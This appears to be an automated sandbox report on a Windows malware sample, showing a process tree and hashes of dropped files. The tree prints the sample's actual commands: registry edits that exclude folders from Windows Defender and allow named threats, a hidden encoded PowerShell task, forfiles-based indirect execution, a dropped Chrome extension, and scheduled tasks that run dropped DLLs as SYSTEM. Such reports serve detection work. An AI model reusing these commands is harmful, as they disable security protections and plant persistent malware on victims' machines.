                                                    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:32
                                                    3⤵
                                                    • System Location Discovery: System Language Discovery
                                                    PID:4232
                                                  • C:\Windows\SysWOW64\reg.exe
                                                    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:64
                                                    3⤵
                                                      PID:3036
                                                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                    powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\AfQFmMtUU\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\AfQFmMtUU\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\LSPuJNxSevMsC\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\LSPuJNxSevMsC\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\XTIErcVviYlSEsscsXR\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\XTIErcVviYlSEsscsXR\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\XuYvvRlLgmUn\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\XuYvvRlLgmUn\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\enDWjyqEZhNU2\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\enDWjyqEZhNU2\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\qDoHUGiKOnuwyvVB\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\qDoHUGiKOnuwyvVB\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\aUtBPNtPIEfbItvst\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\aUtBPNtPIEfbItvst\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\VemQCkOhwRjHyFqD\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\VemQCkOhwRjHyFqD\" /t REG_DWORD /d 0 /reg:64;"
                                                    2⤵
                                                    • Drops file in System32 directory
                                                    • System Location Discovery: System Language Discovery
                                                    • Modifies data under HKEY_USERS
                                                    • Suspicious behavior: EnumeratesProcesses
                                                    • Suspicious use of AdjustPrivilegeToken
                                                    PID:4484
                                                    • C:\Windows\SysWOW64\cmd.exe
                                                      "C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\AfQFmMtUU" /t REG_DWORD /d 0 /reg:32
                                                      3⤵
                                                        PID:2352
                                                        • C:\Windows\SysWOW64\reg.exe
                                                          REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\AfQFmMtUU" /t REG_DWORD /d 0 /reg:32
                                                          4⤵
                                                          • System Location Discovery: System Language Discovery
                                                          PID:4984
                                                      • C:\Windows\SysWOW64\reg.exe
                                                        "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\AfQFmMtUU" /t REG_DWORD /d 0 /reg:64
                                                        3⤵
                                                        • System Location Discovery: System Language Discovery
                                                        PID:4276
                                                      • C:\Windows\SysWOW64\reg.exe
                                                        "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\LSPuJNxSevMsC" /t REG_DWORD /d 0 /reg:32
                                                        3⤵
                                                        • System Location Discovery: System Language Discovery
                                                        PID:1776
                                                      • C:\Windows\SysWOW64\reg.exe
                                                        "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\LSPuJNxSevMsC" /t REG_DWORD /d 0 /reg:64
                                                        3⤵
                                                        • System Location Discovery: System Language Discovery
                                                        PID:4904
                                                      • C:\Windows\SysWOW64\reg.exe
                                                        "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\XTIErcVviYlSEsscsXR" /t REG_DWORD /d 0 /reg:32
                                                        3⤵
                                                        • System Location Discovery: System Language Discovery
                                                        PID:3576
                                                      • C:\Windows\SysWOW64\reg.exe
                                                        "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\XTIErcVviYlSEsscsXR" /t REG_DWORD /d 0 /reg:64
                                                        3⤵
                                                          PID:4492
                                                        • C:\Windows\SysWOW64\reg.exe
                                                          "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\XuYvvRlLgmUn" /t REG_DWORD /d 0 /reg:32
                                                          3⤵
                                                            PID:704
                                                          • C:\Windows\SysWOW64\reg.exe
                                                            "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\XuYvvRlLgmUn" /t REG_DWORD /d 0 /reg:64
                                                            3⤵
                                                              PID:3536
                                                            • C:\Windows\SysWOW64\reg.exe
                                                              "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\enDWjyqEZhNU2" /t REG_DWORD /d 0 /reg:32
                                                              3⤵
                                                              • System Location Discovery: System Language Discovery
                                                              PID:3336
                                                            • C:\Windows\SysWOW64\reg.exe
                                                              "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\enDWjyqEZhNU2" /t REG_DWORD /d 0 /reg:64
                                                              3⤵
                                                                PID:3456
                                                              • C:\Windows\SysWOW64\reg.exe
                                                                "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\qDoHUGiKOnuwyvVB /t REG_DWORD /d 0 /reg:32
                                                                3⤵
                                                                • System Location Discovery: System Language Discovery
                                                                PID:4920
                                                              • C:\Windows\SysWOW64\reg.exe
                                                                "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\qDoHUGiKOnuwyvVB /t REG_DWORD /d 0 /reg:64
                                                                3⤵
                                                                • System Location Discovery: System Language Discovery
                                                                PID:2604
                                                              • C:\Windows\SysWOW64\reg.exe
                                                                "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:32
                                                                3⤵
                                                                • System Location Discovery: System Language Discovery
                                                                PID:2712
                                                              • C:\Windows\SysWOW64\reg.exe
                                                                "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:64
                                                                3⤵
                                                                • System Location Discovery: System Language Discovery
                                                                PID:2908
                                                              • C:\Windows\SysWOW64\reg.exe
                                                                "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\aUtBPNtPIEfbItvst /t REG_DWORD /d 0 /reg:32
                                                                3⤵
                                                                  PID:4036
                                                                • C:\Windows\SysWOW64\reg.exe
                                                                  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\aUtBPNtPIEfbItvst /t REG_DWORD /d 0 /reg:64
                                                                  3⤵
                                                                  • System Location Discovery: System Language Discovery
                                                                  PID:2504
                                                                • C:\Windows\SysWOW64\reg.exe
                                                                  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\VemQCkOhwRjHyFqD /t REG_DWORD /d 0 /reg:32
                                                                  3⤵
                                                                  • System Location Discovery: System Language Discovery
                                                                  PID:1112
                                                                • C:\Windows\SysWOW64\reg.exe
                                                                  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\VemQCkOhwRjHyFqD /t REG_DWORD /d 0 /reg:64
                                                                  3⤵
                                                                  • System Location Discovery: System Language Discovery
                                                                  PID:2716
                                                              • C:\Windows\SysWOW64\schtasks.exe
                                                                schtasks /CREATE /TN "gOhStipVH" /SC once /ST 01:16:47 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
                                                                2⤵
                                                                • System Location Discovery: System Language Discovery
                                                                • Scheduled Task/Job: Scheduled Task
                                                                PID:2788
                                                              • C:\Windows\SysWOW64\schtasks.exe
                                                                schtasks /run /I /tn "gOhStipVH"
                                                                2⤵
                                                                  PID:3688
                                                                • C:\Windows\SysWOW64\schtasks.exe
                                                                  schtasks /DELETE /F /TN "gOhStipVH"
                                                                  2⤵
                                                                  • System Location Discovery: System Language Discovery
                                                                  PID:656
                                                                • C:\Windows\SysWOW64\schtasks.exe
                                                                  schtasks /CREATE /TN "mmcKQTFpdsyEWxyLI" /SC once /ST 21:15:12 /RU "SYSTEM" /TR "\"C:\Windows\Temp\VemQCkOhwRjHyFqD\XOrVWsCSJcOURFj\ldRdXtQ.exe\" pi /qNsUdidXX 525403 /S" /V1 /F
                                                                  2⤵
                                                                  • Drops file in Windows directory
                                                                  • System Location Discovery: System Language Discovery
                                                                  • Scheduled Task/Job: Scheduled Task
                                                                  PID:4932
                                                                • C:\Windows\SysWOW64\schtasks.exe
                                                                  schtasks /run /I /tn "mmcKQTFpdsyEWxyLI"
                                                                  2⤵
                                                                    PID:828
                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                    C:\Windows\SysWOW64\WerFault.exe -u -p 556 -s 796
                                                                    2⤵
                                                                    • Program crash
                                                                    PID:3824
                                                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
                                                                  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
                                                                  1⤵
                                                                  • Command and Scripting Interpreter: PowerShell
                                                                  • Suspicious behavior: EnumeratesProcesses
                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                  PID:876
                                                                  • C:\Windows\system32\gpupdate.exe
                                                                    "C:\Windows\system32\gpupdate.exe" /force
                                                                    2⤵
                                                                      PID:1524
                                                                  • \??\c:\windows\system32\svchost.exe
                                                                    c:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s fhsvc
                                                                    1⤵
                                                                      PID:4100
                                                                    • C:\Windows\system32\svchost.exe
                                                                      C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum
                                                                      1⤵
                                                                        PID:4672
                                                                      • \??\c:\windows\system32\gpscript.exe
                                                                        gpscript.exe /RefreshSystemParam
                                                                        1⤵
                                                                          PID:2692
                                                                        • C:\Windows\Temp\VemQCkOhwRjHyFqD\XOrVWsCSJcOURFj\ldRdXtQ.exe
                                                                          C:\Windows\Temp\VemQCkOhwRjHyFqD\XOrVWsCSJcOURFj\ldRdXtQ.exe pi /qNsUdidXX 525403 /S
                                                                          1⤵
                                                                          • Checks computer location settings
                                                                          • Executes dropped EXE
                                                                          • Drops Chrome extension
                                                                          • Drops file in System32 directory
                                                                          • Drops file in Program Files directory
                                                                          • Modifies data under HKEY_USERS
                                                                          • Suspicious behavior: EnumeratesProcesses
                                                                          PID:5080
                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                            "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
                                                                            2⤵
                                                                              PID:4928
                                                                              • C:\Windows\SysWOW64\forfiles.exe
                                                                                forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"
                                                                                3⤵
                                                                                • Indirect Command Execution
                                                                                PID:4664
                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                  /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
                                                                                  4⤵
                                                                                  • System Location Discovery: System Language Discovery
                                                                                  PID:3592
                                                                                  • \??\c:\windows\SysWOW64\reg.exe
                                                                                    reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
                                                                                    5⤵
                                                                                      PID:2568
                                                                                • C:\Windows\SysWOW64\forfiles.exe
                                                                                  forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"
                                                                                  3⤵
                                                                                  • Indirect Command Execution
                                                                                  • System Location Discovery: System Language Discovery
                                                                                  PID:836
                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                    /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
                                                                                    4⤵
                                                                                      PID:4588
                                                                                      • \??\c:\windows\SysWOW64\reg.exe
                                                                                        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
                                                                                        5⤵
                                                                                          PID:3880
                                                                                    • C:\Windows\SysWOW64\forfiles.exe
                                                                                      forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"
                                                                                      3⤵
                                                                                      • Indirect Command Execution
                                                                                      • System Location Discovery: System Language Discovery
                                                                                      PID:348
                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                        /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
                                                                                        4⤵
                                                                                        • System Location Discovery: System Language Discovery
                                                                                        PID:4912
                                                                                        • \??\c:\windows\SysWOW64\reg.exe
                                                                                          reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
                                                                                          5⤵
                                                                                            PID:1796
                                                                                      • C:\Windows\SysWOW64\forfiles.exe
                                                                                        forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"
                                                                                        3⤵
                                                                                        • Indirect Command Execution
                                                                                        PID:2968
                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                          /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
                                                                                          4⤵
                                                                                            PID:2896
                                                                                            • \??\c:\windows\SysWOW64\reg.exe
                                                                                              reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
                                                                                              5⤵
                                                                                                PID:428
                                                                                          • C:\Windows\SysWOW64\forfiles.exe
                                                                                            forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
                                                                                            3⤵
                                                                                            • Indirect Command Execution
                                                                                            PID:1052
                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                              /C powershell start-process -WindowStyle Hidden gpupdate.exe /force
                                                                                              4⤵
                                                                                                PID:2288
                                                                                                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                  powershell start-process -WindowStyle Hidden gpupdate.exe /force
                                                                                                  5⤵
                                                                                                  • Command and Scripting Interpreter: PowerShell
                                                                                                  • Drops file in System32 directory
                                                                                                  • Modifies data under HKEY_USERS
                                                                                                  • Suspicious behavior: EnumeratesProcesses
                                                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                                                  PID:700
                                                                                                  • C:\Windows\SysWOW64\gpupdate.exe
                                                                                                    "C:\Windows\system32\gpupdate.exe" /force
                                                                                                    6⤵
                                                                                                      PID:4732
                                                                                            • C:\Windows\SysWOW64\schtasks.exe
                                                                                              schtasks /DELETE /F /TN "bJaUjLwxLUDwMvBjjy"
                                                                                              2⤵
                                                                                                PID:1472
                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True" &
                                                                                                2⤵
                                                                                                • System Location Discovery: System Language Discovery
                                                                                                PID:2640
                                                                                                • C:\Windows\SysWOW64\forfiles.exe
                                                                                                  forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True"
                                                                                                  3⤵
                                                                                                  • Indirect Command Execution
                                                                                                  PID:2876
                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                    /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True
                                                                                                    4⤵
                                                                                                    • System Location Discovery: System Language Discovery
                                                                                                    PID:4076
                                                                                                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                      powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True
                                                                                                      5⤵
                                                                                                      • Command and Scripting Interpreter: PowerShell
                                                                                                      • Drops file in System32 directory
                                                                                                      • Modifies data under HKEY_USERS
                                                                                                      • Suspicious behavior: EnumeratesProcesses
                                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                                      PID:4460
                                                                                                      • C:\Windows\SysWOW64\Wbem\WMIC.exe
                                                                                                        "C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True
                                                                                                        6⤵
                                                                                                        • System Location Discovery: System Language Discovery
                                                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                                                        PID:2936
                                                                                              • C:\Windows\SysWOW64\schtasks.exe
                                                                                                schtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\AfQFmMtUU\esvhOO.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "PWWBhyALfcSbedp" /V1 /F
                                                                                                2⤵
                                                                                                • Drops file in Windows directory
                                                                                                • Scheduled Task/Job: Scheduled Task
                                                                                                PID:524
                                                                                              • C:\Windows\SysWOW64\schtasks.exe
                                                                                                schtasks /CREATE /TN "PWWBhyALfcSbedp2" /F /xml "C:\Program Files (x86)\AfQFmMtUU\XOCoTQP.xml" /RU "SYSTEM"
                                                                                                2⤵
                                                                                                • System Location Discovery: System Language Discovery
                                                                                                • Scheduled Task/Job: Scheduled Task
                                                                                                PID:4916
                                                                                              • C:\Windows\SysWOW64\schtasks.exe
                                                                                                schtasks /END /TN "PWWBhyALfcSbedp"
                                                                                                2⤵
                                                                                                • System Location Discovery: System Language Discovery
                                                                                                PID:4356
                                                                                              • C:\Windows\SysWOW64\schtasks.exe
                                                                                                schtasks /DELETE /F /TN "PWWBhyALfcSbedp"
                                                                                                2⤵
                                                                                                  PID:3092
                                                                                                • C:\Windows\SysWOW64\schtasks.exe
                                                                                                  schtasks /CREATE /TN "RprkBAAFxCYqMr" /F /xml "C:\Program Files (x86)\enDWjyqEZhNU2\fdIHimO.xml" /RU "SYSTEM"
                                                                                                  2⤵
                                                                                                  • System Location Discovery: System Language Discovery
                                                                                                  • Scheduled Task/Job: Scheduled Task
                                                                                                  PID:824
                                                                                                • C:\Windows\SysWOW64\schtasks.exe
                                                                                                  schtasks /CREATE /TN "isOwubXyPbRIa2" /F /xml "C:\ProgramData\qDoHUGiKOnuwyvVB\yMmFkNX.xml" /RU "SYSTEM"
                                                                                                  2⤵
                                                                                                  • System Location Discovery: System Language Discovery
                                                                                                  • Scheduled Task/Job: Scheduled Task
                                                                                                  PID:4120
                                                                                                • C:\Windows\SysWOW64\schtasks.exe
                                                                                                  schtasks /CREATE /TN "ZPzYZUwOurxmvkKKy2" /F /xml "C:\Program Files (x86)\XTIErcVviYlSEsscsXR\fXBzvWd.xml" /RU "SYSTEM"
                                                                                                  2⤵
                                                                                                  • Scheduled Task/Job: Scheduled Task
                                                                                                  PID:3088
                                                                                                • C:\Windows\SysWOW64\schtasks.exe
                                                                                                  schtasks /CREATE /TN "gtjPvKPVMNaEWIYZSDJ2" /F /xml "C:\Program Files (x86)\LSPuJNxSevMsC\eXKTJjP.xml" /RU "SYSTEM"
                                                                                                  2⤵
                                                                                                  • Scheduled Task/Job: Scheduled Task
                                                                                                  PID:1660
                                                                                                • C:\Windows\SysWOW64\schtasks.exe
                                                                                                  schtasks /CREATE /TN "ALUoYMkKWcUKdiGlz" /SC once /ST 08:54:58 /RU "SYSTEM" /TR "rundll32 \"C:\Windows\Temp\VemQCkOhwRjHyFqD\QkJtYSBt\SWpyOuy.dll\",#1 /sdidQhD 525403" /V1 /F
                                                                                                  2⤵
                                                                                                  • Drops file in Windows directory
                                                                                                  • Scheduled Task/Job: Scheduled Task
                                                                                                  PID:2820
                                                                                                • C:\Windows\SysWOW64\schtasks.exe
                                                                                                  schtasks /run /I /tn "ALUoYMkKWcUKdiGlz"
                                                                                                  2⤵
                                                                                                    PID:4076
                                                                                                  • C:\Windows\SysWOW64\schtasks.exe
                                                                                                    schtasks /DELETE /F /TN "mmcKQTFpdsyEWxyLI"
                                                                                                    2⤵
                                                                                                      PID:2300
                                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                                      C:\Windows\SysWOW64\WerFault.exe -u -p 5080 -s 2248
                                                                                                      2⤵
                                                                                                      • Program crash
                                                                                                      PID:1928
                                                                                                  • \??\c:\windows\system32\rundll32.EXE
                                                                                                    c:\windows\system32\rundll32.EXE "C:\Windows\Temp\VemQCkOhwRjHyFqD\QkJtYSBt\SWpyOuy.dll",#1 /sdidQhD 525403
                                                                                                    1⤵
                                                                                                      PID:2640
                                                                                                      • C:\Windows\SysWOW64\rundll32.exe
                                                                                                        c:\windows\system32\rundll32.EXE "C:\Windows\Temp\VemQCkOhwRjHyFqD\QkJtYSBt\SWpyOuy.dll",#1 /sdidQhD 525403
                                                                                                        2⤵
                                                                                                        • Blocklisted process makes network request
                                                                                                        • Checks BIOS information in registry
                                                                                                        • Loads dropped DLL
                                                                                                        • Drops file in System32 directory
                                                                                                        • System Location Discovery: System Language Discovery
                                                                                                        • Enumerates system info in registry
                                                                                                        • Modifies data under HKEY_USERS
                                                                                                        PID:792
                                                                                                        • C:\Windows\SysWOW64\schtasks.exe
                                                                                                          schtasks /DELETE /F /TN "ALUoYMkKWcUKdiGlz"
                                                                                                          3⤵
                                                                                                          • System Location Discovery: System Language Discovery
                                                                                                          PID:1252

                                                                                                    Network

                                                                                                    MITRE ATT&CK Enterprise v15

                                                                                                    Replay Monitor

                                                                                                    Loading Replay Monitor...

                                                                                                    Downloads

                                                                                                    • C:\$RECYCLE.BIN\S-1-5-18\desktop.ini

                                                                                                      Filesize

                                                                                                      129B

                                                                                                      MD5

                                                                                                      a526b9e7c716b3489d8cc062fbce4005

                                                                                                      SHA1

                                                                                                      2df502a944ff721241be20a9e449d2acd07e0312

                                                                                                      SHA256

                                                                                                      e1b9ce9b57957b1a0607a72a057d6b7a9b34ea60f3f8aa8f38a3af979bd23066

                                                                                                      SHA512

                                                                                                      d83d4c656c96c3d1809ad06ce78fa09a77781461c99109e4b81d1a186fc533a7e72d65a4cb7edf689eeccda8f687a13d3276f1111a1e72f7c3cd92a49bce0f88

                                                                                                    • C:\Program Files (x86)\AfQFmMtUU\XOCoTQP.xml

                                                                                                      Filesize

                                                                                                      2KB

                                                                                                      MD5

                                                                                                      288af155879a21a2e45605662ede10af

                                                                                                      SHA1

                                                                                                      9b3472e7e50534cf67c00feec702a41c066cf1f2

                                                                                                      SHA256

                                                                                                      2d6ac4aedee5729ee63ddc1b6bca66a60628b0576b76f26f760aec82569052ff

                                                                                                      SHA512

                                                                                                      e49c12fa766e60a8c591b5f773f2e9e58a7f7fdd5248de17cba020211a2788a534e70c369ea3c8c6264a9ee7dfc7c068bb71193064fb4bab44b8d4c31589610d

                                                                                                    • C:\Program Files (x86)\LSPuJNxSevMsC\eXKTJjP.xml

                                                                                                      Filesize

                                                                                                      2KB

                                                                                                      MD5

                                                                                                      6140f5dd668fc5de029dcc3cab693dc4

                                                                                                      SHA1

                                                                                                      2145e2050028da75a347e8f5d3a24c18e48b4993

                                                                                                      SHA256

                                                                                                      96b6bb787622459a537ed1a04d7723194d748542ff7c08c7882542f1a84b0cee

                                                                                                      SHA512

